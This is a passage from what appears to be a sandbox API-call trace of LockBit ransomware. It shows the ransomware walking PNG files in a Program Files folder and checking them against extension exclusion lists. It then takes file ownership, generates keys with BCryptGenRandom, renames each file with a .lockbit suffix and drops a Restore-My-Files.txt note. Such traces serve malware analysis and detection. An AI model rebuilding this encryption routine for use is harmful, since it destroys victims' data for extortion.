(lpString1=".rom", lpString2=".png") returned 1 [0085.669] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0085.669] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0085.669] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0085.669] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0085.669] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0085.669] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0085.669] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0085.670] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0085.670] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0085.670] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0085.670] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0085.670] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0085.670] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.670] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0085.670] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0085.670] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0085.670] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0085.670] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="1047x576_91n92.png") returned 1 [0085.670] lstrcmpiW (lpString1="ntldr", lpString2="1047x576_91n92.png") returned 1 [0085.670] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="1047x576_91n92.png") returned 1 [0085.670] lstrcmpiW (lpString1="bootsect.bak", lpString2="1047x576_91n92.png") returned 1 [0085.670] lstrcmpiW (lpString1="autorun.inf", lpString2="1047x576_91n92.png") returned 1 [0085.670] lstrcmpiW (lpString1="thumbs.db", lpString2="1047x576_91n92.png") returned 1 [0085.670] lstrcmpiW (lpString1="iconcache.db", lpString2="1047x576_91n92.png") returned 1 [0085.670] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\") returned="" [0085.671] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576_91n92.png") returned=".png" [0085.671] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0085.671] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0085.671] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0085.671] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0085.671] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0085.671] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0085.671] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0085.671] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0085.671] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0085.671] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0085.671] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0085.671] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0085.671] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0085.671] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0085.671] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0085.671] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0085.671] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0085.671] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0085.672] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0085.672] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0085.672] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0085.672] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0085.672] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0085.672] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0085.672] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0085.672] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0085.672] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0085.672] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0085.672] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576_91n92.png.lockbit") returned 82 [0085.672] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576_91n92.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\1047x576_91n92.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.673] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.673] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.673] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.673] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.674] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.674] RtlFreeAnsiString (AnsiString="\\") [0085.674] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3bc) returned 0x0 [0085.674] malloc (_Size=0x200) returned 0x77d800 [0085.674] NtQueryInformationToken (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0085.674] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.674] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.674] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576_91n92.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.675] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576_91n92.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.675] CloseHandle (hObject=0x3bc) returned 1 [0085.675] free (_Block=0x77d800) [0085.675] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576_91n92.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\1047x576_91n92.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0085.675] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.675] malloc (_Size=0x40068) returned 0x3df0008 [0085.675] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6440) returned 1 [0085.676] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.676] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.676] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0085.676] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.677] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0085.677] ReadFile (in: hFile=0x3bc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0085.682] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576_91n92.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576_91n92.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.682] malloc (_Size=0xba) returned 0x77d800 [0085.682] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xba, FileInformationClass=0xa) returned 0x0 [0085.683] free (_Block=0x77d800) [0085.683] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576_91n92.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles") returned 1 [0085.683] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\Restore-My-Files.txt") returned 76 [0085.683] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.683] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f9ee2bd, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f9ee2bd, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eee5249, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb05, dwReserved0=0x0, dwReserved1=0x0, cFileName="15x15dot.png", cAlternateFileName="")) returned 1 [0085.683] lstrcmpiW (lpString1=".", lpString2="15x15dot.png") returned -1 [0085.684] lstrcmpiW (lpString1="..", lpString2="15x15dot.png") returned -1 [0085.684] PathFindExtensionW (pszPath="15x15dot.png") returned=".png" [0085.684] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0085.684] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0085.684] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0085.684] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0085.684] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0085.684] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0085.684] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0085.684] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0085.684] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0085.684] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0085.684] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0085.684] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0085.684] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0085.684] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0085.684] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0085.685] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0085.685] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0085.685] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0085.685] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0085.685] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0085.685] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0085.685] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0085.685] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0085.685] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0085.685] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.685] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0085.685] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0085.685] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0085.685] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0085.685] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0085.685] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0085.685] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0085.685] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0085.686] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0085.686] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0085.686] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0085.686] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0085.686] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0085.686] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0085.686] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0085.686] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0085.686] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0085.686] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.686] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0085.686] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0085.686] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0085.686] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0085.686] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="15x15dot.png") returned 1 [0085.686] lstrcmpiW (lpString1="ntldr", lpString2="15x15dot.png") returned 1 [0085.686] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="15x15dot.png") returned 1 [0085.686] lstrcmpiW (lpString1="bootsect.bak", lpString2="15x15dot.png") returned 1 [0085.687] lstrcmpiW (lpString1="autorun.inf", lpString2="15x15dot.png") returned 1 [0085.687] lstrcmpiW (lpString1="thumbs.db", lpString2="15x15dot.png") returned 1 [0085.687] lstrcmpiW (lpString1="iconcache.db", lpString2="15x15dot.png") returned 1 [0085.687] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\") returned="" [0085.687] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\15x15dot.png") returned=".png" [0085.687] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0085.687] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0085.687] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0085.687] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0085.687] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0085.687] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0085.687] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0085.687] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0085.687] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0085.687] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0085.687] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0085.687] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0085.687] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0085.688] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0085.688] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0085.688] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0085.688] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0085.688] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0085.688] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0085.688] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0085.688] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0085.688] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0085.688] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0085.688] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0085.688] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0085.688] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0085.689] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0085.689] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0085.689] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\15x15dot.png.lockbit") returned 76 [0085.689] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\15x15dot.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.689] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.690] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.690] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.690] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.690] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.691] RtlFreeAnsiString (AnsiString="\\") [0085.691] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3ac) returned 0x0 [0085.691] malloc (_Size=0x200) returned 0x77d800 [0085.691] NtQueryInformationToken (in: TokenHandle=0x3ac, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0085.691] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.691] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.691] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\15x15dot.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.692] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\15x15dot.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.692] CloseHandle (hObject=0x3ac) returned 1 [0085.692] free (_Block=0x77d800) [0085.692] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\15x15dot.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0085.693] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.693] malloc (_Size=0x40068) returned 0x1ff1e60 [0085.693] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2821) returned 1 [0085.693] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.694] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.694] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0085.694] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.694] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.694] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0085.694] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0085.701] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\15x15dot.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\15x15dot.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.701] malloc (_Size=0xae) returned 0x77d800 [0085.701] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xae, FileInformationClass=0xa) returned 0x0 [0085.701] free (_Block=0x77d800) [0085.701] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\15x15dot.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles") returned 1 [0085.701] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\Restore-My-Files.txt") returned 76 [0085.701] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.702] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f9a2003, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f9a2003, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ef0b3a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x15f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="720x480icongraphic.png", cAlternateFileName="")) returned 1 [0085.702] lstrcmpiW (lpString1=".", lpString2="720x480icongraphic.png") returned -1 [0085.702] lstrcmpiW (lpString1="..", lpString2="720x480icongraphic.png") returned -1 [0085.702] PathFindExtensionW (pszPath="720x480icongraphic.png") returned=".png" [0085.702] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0085.702] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0085.702] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0085.702] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0085.702] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0085.702] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0085.702] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0085.702] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0085.702] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0085.702] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0085.702] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0085.702] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0085.702] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0085.702] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0085.703] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0085.703] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0085.703] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0085.703] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0085.703] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0085.703] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0085.703] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0085.703] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0085.703] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0085.703] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0085.703] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.703] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0085.703] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0085.703] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0085.703] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0085.703] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0085.703] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0085.703] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0085.704] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0085.704] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0085.704] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0085.704] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0085.704] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0085.704] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0085.704] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0085.704] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0085.704] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0085.704] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0085.704] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.704] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0085.704] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0085.704] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0085.704] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0085.704] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="720x480icongraphic.png") returned 1 [0085.704] lstrcmpiW (lpString1="ntldr", lpString2="720x480icongraphic.png") returned 1 [0085.705] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="720x480icongraphic.png") returned 1 [0085.705] lstrcmpiW (lpString1="bootsect.bak", lpString2="720x480icongraphic.png") returned 1 [0085.705] lstrcmpiW (lpString1="autorun.inf", lpString2="720x480icongraphic.png") returned 1 [0085.705] lstrcmpiW (lpString1="thumbs.db", lpString2="720x480icongraphic.png") returned 1 [0085.705] lstrcmpiW (lpString1="iconcache.db", lpString2="720x480icongraphic.png") returned 1 [0085.705] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\") returned="" [0085.705] PathFindExtensionW 